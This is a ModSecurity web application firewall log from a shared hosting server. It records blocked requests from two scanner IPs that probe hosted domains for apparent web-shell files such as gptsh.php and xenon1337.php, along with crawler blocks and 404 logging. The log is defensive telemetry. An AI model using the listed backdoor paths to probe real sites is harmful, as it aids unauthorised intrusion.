[Tue May 26 16:51:50.839477 2026] [security2:error] [pid 817651:tid 817843] [client 20.151.130.61:64523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wpconf.php"] [unique_id "ahWCTtlGRCPPN1dS2y3DCAAAAMM"]
[Tue May 26 16:51:50.839596 2026] [security2:error] [pid 817651:tid 817843] [client 20.151.130.61:64523] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wpconf.php"] [unique_id "ahWCTtlGRCPPN1dS2y3DCAAAAMM"]
[Tue May 26 16:51:51.013585 2026] [security2:error] [pid 817651:tid 817824] [client 20.151.130.61:65222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/aaf.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DDAAAALA"]
[Tue May 26 16:51:51.013716 2026] [security2:error] [pid 817651:tid 817824] [client 20.151.130.61:65222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/aaf.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DDAAAALA"]
[Tue May 26 16:51:51.041736 2026] [security2:error] [pid 817651:tid 817855] [client 20.206.111.203:6019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/hypo.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DDgAAAM8"]
[Tue May 26 16:51:51.041828 2026] [security2:error] [pid 817651:tid 817855] [client 20.206.111.203:6019] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/hypo.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DDgAAAM8"]
[Tue May 26 16:51:51.120141 2026] [security2:error] [pid 817651:tid 817809] [client 114.119.159.121:31313] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/robots.txt"] [unique_id "ahWCT9lGRCPPN1dS2y3DEwAAAKE"]
[Tue May 26 16:51:51.222122 2026] [security2:error] [pid 817651:tid 817905] [client 20.151.130.61:65316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wander.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DGgAAAQE"]
[Tue May 26 16:51:51.222213 2026] [security2:error] [pid 817651:tid 817905] [client 20.151.130.61:65316] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wander.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DGgAAAQE"]
[Tue May 26 16:51:51.483114 2026] [security2:error] [pid 817651:tid 817856] [client 20.151.130.61:64561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/gptsh.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DIAAAANA"]
[Tue May 26 16:51:51.483209 2026] [security2:error] [pid 817651:tid 817856] [client 20.151.130.61:64561] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/gptsh.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DIAAAANA"]
[Tue May 26 16:51:51.518525 2026] [security2:error] [pid 817651:tid 817886] [client 20.206.111.203:6065] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/"] [unique_id "ahWCT9lGRCPPN1dS2y3DJQAAAO4"]
[Tue May 26 16:51:51.706929 2026] [security2:error] [pid 817651:tid 817906] [client 20.151.130.61:65334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/xocx.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DJwAAAQI"]
[Tue May 26 16:51:51.707112 2026] [security2:error] [pid 817651:tid 817906] [client 20.151.130.61:65334] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/xocx.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DJwAAAQI"]
[Tue May 26 16:51:51.712618 2026] [security2:error] [pid 823496:tid 823742] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCT5a08mrtyBNpA4PmGgAAAHI"]
[Tue May 26 16:51:51.798076 2026] [security2:error] [pid 817651:tid 817872] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCTtlGRCPPN1dS2y3DCwAAAOA"]
[Tue May 26 16:51:51.884110 2026] [security2:error] [pid 823496:tid 823695] [client 20.151.130.61:65277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/155.php"] [unique_id "ahWCT5a08mrtyBNpA4PmHAAAAEM"]
[Tue May 26 16:51:51.884234 2026] [security2:error] [pid 823496:tid 823695] [client 20.151.130.61:65277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/155.php"] [unique_id "ahWCT5a08mrtyBNpA4PmHAAAAEM"]
[Tue May 26 16:51:51.894388 2026] [security2:error] [pid 817651:tid 817889] [client 20.206.111.203:6065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DKgAAAPE"]
[Tue May 26 16:51:51.894480 2026] [security2:error] [pid 817651:tid 817889] [client 20.206.111.203:6065] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahWCT9lGRCPPN1dS2y3DKgAAAPE"]
[Tue May 26 16:51:52.047416 2026] [security2:error] [pid 823496:tid 823647] [client 85.208.96.210:60960] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahWCUJa08mrtyBNpA4PmHgAAABM"]
[Tue May 26 16:51:52.047542 2026] [security2:error] [pid 823496:tid 823647] [client 85.208.96.210:60960] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahWCUJa08mrtyBNpA4PmHgAAABM"]
[Tue May 26 16:51:52.210155 2026] [security2:error] [pid 823496:tid 823662] [client 20.151.130.61:64453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/colay.php"] [unique_id "ahWCUJa08mrtyBNpA4PmJAAAACI"]
[Tue May 26 16:51:52.210263 2026] [security2:error] [pid 823496:tid 823662] [client 20.151.130.61:64453] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/colay.php"] [unique_id "ahWCUJa08mrtyBNpA4PmJAAAACI"]
[Tue May 26 16:51:52.273525 2026] [security2:error] [pid 817651:tid 817827] [client 20.206.111.203:6103] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/block-bindings/"] [unique_id "ahWCUNlGRCPPN1dS2y3DMQAAALM"]
[Tue May 26 16:51:52.467222 2026] [security2:error] [pid 823496:tid 823728] [client 20.206.111.203:6097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCUJa08mrtyBNpA4PmJQAAAGQ"]
[Tue May 26 16:51:52.467562 2026] [security2:error] [pid 817651:tid 817884] [client 20.151.130.61:65266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/hly.php"] [unique_id "ahWCUNlGRCPPN1dS2y3DNQAAAOw"]
[Tue May 26 16:51:52.467705 2026] [security2:error] [pid 817651:tid 817884] [client 20.151.130.61:65266] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/hly.php"] [unique_id "ahWCUNlGRCPPN1dS2y3DNQAAAOw"]
[Tue May 26 16:51:52.648608 2026] [security2:error] [pid 817651:tid 817888] [client 20.206.111.203:6103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/00.php"] [unique_id "ahWCUNlGRCPPN1dS2y3DNwAAAPA"]
[Tue May 26 16:51:52.648744 2026] [security2:error] [pid 817651:tid 817888] [client 20.206.111.203:6103] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/00.php"] [unique_id "ahWCUNlGRCPPN1dS2y3DNwAAAPA"]
[Tue May 26 16:51:52.663551 2026] [security2:error] [pid 823496:tid 823672] [client 20.151.130.61:65308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/ppp.php"] [unique_id "ahWCUJa08mrtyBNpA4PmKQAAACw"]
[Tue May 26 16:51:52.663662 2026] [security2:error] [pid 823496:tid 823672] [client 20.151.130.61:65308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/ppp.php"] [unique_id "ahWCUJa08mrtyBNpA4PmKQAAACw"]
[Tue May 26 16:51:52.851795 2026] [security2:error] [pid 817651:tid 817808] [client 20.151.130.61:64555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWCUNlGRCPPN1dS2y3DOwAAAKA"]
[Tue May 26 16:51:52.851894 2026] [security2:error] [pid 817651:tid 817808] [client 20.151.130.61:64555] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWCUNlGRCPPN1dS2y3DOwAAAKA"]
[Tue May 26 16:51:53.031337 2026] [security2:error] [pid 817651:tid 817817] [client 20.206.111.203:6133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/als.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DQQAAAKk"]
[Tue May 26 16:51:53.031489 2026] [security2:error] [pid 817651:tid 817817] [client 20.206.111.203:6133] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/als.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DQQAAAKk"]
[Tue May 26 16:51:53.171186 2026] [security2:error] [pid 823496:tid 823665] [client 20.151.130.61:65288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWCUZa08mrtyBNpA4PmMgAAACU"]
[Tue May 26 16:51:53.171310 2026] [security2:error] [pid 823496:tid 823665] [client 20.151.130.61:65288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWCUZa08mrtyBNpA4PmMgAAACU"]
[Tue May 26 16:51:53.434235 2026] [security2:error] [pid 817651:tid 817834] [client 20.206.111.203:6099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/pol.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DRwAAALo"]
[Tue May 26 16:51:53.434359 2026] [security2:error] [pid 817651:tid 817834] [client 20.206.111.203:6099] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/pol.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DRwAAALo"]
[Tue May 26 16:51:53.847276 2026] [security2:error] [pid 817651:tid 817829] [client 20.206.111.203:6018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ll.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DSgAAALU"]
[Tue May 26 16:51:53.847370 2026] [security2:error] [pid 817651:tid 817829] [client 20.206.111.203:6018] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ll.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DSgAAALU"]
[Tue May 26 16:51:53.878719 2026] [security2:error] [pid 817651:tid 817850] [client 20.151.130.61:65219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DSwAAAMo"]
[Tue May 26 16:51:53.878811 2026] [security2:error] [pid 817651:tid 817850] [client 20.151.130.61:65219] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DSwAAAMo"]
[Tue May 26 16:51:54.228192 2026] [security2:error] [pid 817651:tid 817885] [client 20.206.111.203:6092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahWCUtlGRCPPN1dS2y3DUgAAAO0"]
[Tue May 26 16:51:54.228327 2026] [security2:error] [pid 817651:tid 817885] [client 20.206.111.203:6092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahWCUtlGRCPPN1dS2y3DUgAAAO0"]
[Tue May 26 16:51:54.255673 2026] [security2:error] [pid 817651:tid 817823] [client 20.151.130.61:65274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWCUtlGRCPPN1dS2y3DUwAAAK8"]
[Tue May 26 16:51:54.255776 2026] [security2:error] [pid 817651:tid 817823] [client 20.151.130.61:65274] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWCUtlGRCPPN1dS2y3DUwAAAK8"]
[Tue May 26 16:51:54.308391 2026] [security2:error] [pid 817651:tid 817883] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCUdlGRCPPN1dS2y3DRAAAAOs"]
[Tue May 26 16:51:54.591165 2026] [security2:error] [pid 823496:tid 823635] [client 20.151.130.61:65329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWCUpa08mrtyBNpA4PmSQAAAAc"]
[Tue May 26 16:51:54.591249 2026] [security2:error] [pid 823496:tid 823635] [client 20.151.130.61:65329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWCUpa08mrtyBNpA4PmSQAAAAc"]
[Tue May 26 16:51:54.631263 2026] [security2:error] [pid 823496:tid 823747] [client 20.206.111.203:5953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWCUpa08mrtyBNpA4PmSgAAAHc"]
[Tue May 26 16:51:54.631342 2026] [security2:error] [pid 823496:tid 823747] [client 20.206.111.203:5953] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWCUpa08mrtyBNpA4PmSgAAAHc"]
[Tue May 26 16:51:54.819872 2026] [security2:error] [pid 823496:tid 823671] [client 20.151.130.61:64570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWCUpa08mrtyBNpA4PmTgAAACs"]
[Tue May 26 16:51:54.819967 2026] [security2:error] [pid 823496:tid 823671] [client 20.151.130.61:64570] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWCUpa08mrtyBNpA4PmTgAAACs"]
[Tue May 26 16:51:55.023328 2026] [security2:error] [pid 817651:tid 817875] [client 20.206.111.203:5987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahWCU9lGRCPPN1dS2y3DVwAAAOM"]
[Tue May 26 16:51:55.023474 2026] [security2:error] [pid 817651:tid 817875] [client 20.206.111.203:5987] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahWCU9lGRCPPN1dS2y3DVwAAAOM"]
[Tue May 26 16:51:55.139182 2026] [security2:error] [pid 823496:tid 823628] [client 20.151.130.61:64455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWCU5a08mrtyBNpA4PmUgAAAAA"]
[Tue May 26 16:51:55.139318 2026] [security2:error] [pid 823496:tid 823628] [client 20.151.130.61:64455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWCU5a08mrtyBNpA4PmUgAAAAA"]
